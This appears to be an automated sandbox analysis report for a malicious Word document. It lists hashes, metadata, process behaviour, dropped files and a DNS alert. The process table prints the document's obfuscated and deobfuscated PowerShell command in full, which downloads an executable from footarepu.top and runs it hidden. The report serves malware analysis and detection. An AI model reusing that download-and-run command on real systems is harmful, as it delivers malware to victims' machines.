analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | 8164.doc |
| Full analysis: | https://app.any.run/tasks/08c654e1-464d-4e6e-8033-a508f80d6628 |
| Verdict: | Malicious activity |
| Analysis date: | February 22, 2020, 15:01:14 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 27 23:05:00 2017, Last Saved Time/Date: Fri Jan 27 23:05:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
| MD5: | E1649855A736AEBF072A540A69198BD4 |
| SHA1: | 8E7118F73BCE5DBDFBD542F4E8E752FC9043A292 |
| SHA256: | 90724610C70BD1167B08B047A28137ABD2888A817038850AEA1DDB1D6288E672 |
| SSDEEP: | 1536:vxZNSTdB+Gs62NzfNK8oHvsTXVRV7ulY2ZNYyJjQoBhk+n7a:XNST/+RNKBHvsTXF76XZPhBGw7a |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3200)
Executes PowerShell scripts
- cmD.EXe (PID: 3528)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3200)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 2364)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3200)
Creates files in the user directory
- WINWORD.EXE (PID: 3200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Template: | Normal |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2017:01:27 23:05:00 |
| ModifyDate: | 2017:01:27 23:05:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 5 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 5 |
| AppVersion: | 14 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3200 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\8164.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3528 | cmD.EXe /C "pow^Er^ShEL^L.e^X^E -^e^x^e^C^ut^iO^NpoL^I^cY^ ^byp^AS^s -^N^o^p^R^OFIl^e -^w^IND^O^wsTylE ^hI^d^DE^N ^(nEW-^o^bjEcT sYSTeM^.nET^.we^BClIeNT)^.^D^O^wnloA^dFiL^e^('http://footarepu.top/read.php?f=0.dat','%ApPdAta%.EXe')^;^sT^a^r^t^-^Pr^ocESS '%aPpdATa%.eXe'" | C:\Windows\system32\cmD.EXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2364 | powErShELL.eXE -exeCutiONpoLIcY bypASs -NopROFIle -wINDOwsTylE hIdDEN (nEW-objEcT sYSTeM.nET.weBClIeNT).DOwnloAdFiLe('http://footarepu.top/read.php?f=0.dat','C:\Users\admin\AppData\Roaming.EXe');sTart-ProcESS 'C:\Users\admin\AppData\Roaming.eXe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmD.EXe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 846
Read events
1 069
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5D6A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMD27NDTZ3P4OMCAKS1U.temp | — | |
MD5:— | SHA256:— | |||
| 2364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa665c7.TMP | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
| 2364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
| 3200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$8164.doc | pgc | |
MD5:4864F7F5BF95D66897CB9F014DB73283 | SHA256:FF96DB654AFB57396D238FF008DA7F189FD4EDE81C35897974F5C41729B85672 | |||
| 3200 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:820562CB8F06EF3ED57C705B80669B84 | SHA256:DFBF3C666632754136036385E060BC1588C1DDF6A8A8F205AD774ACBD62C9A21 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
DNS requests
Domain | IP | Reputation |
|---|---|---|
footarepu.top |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |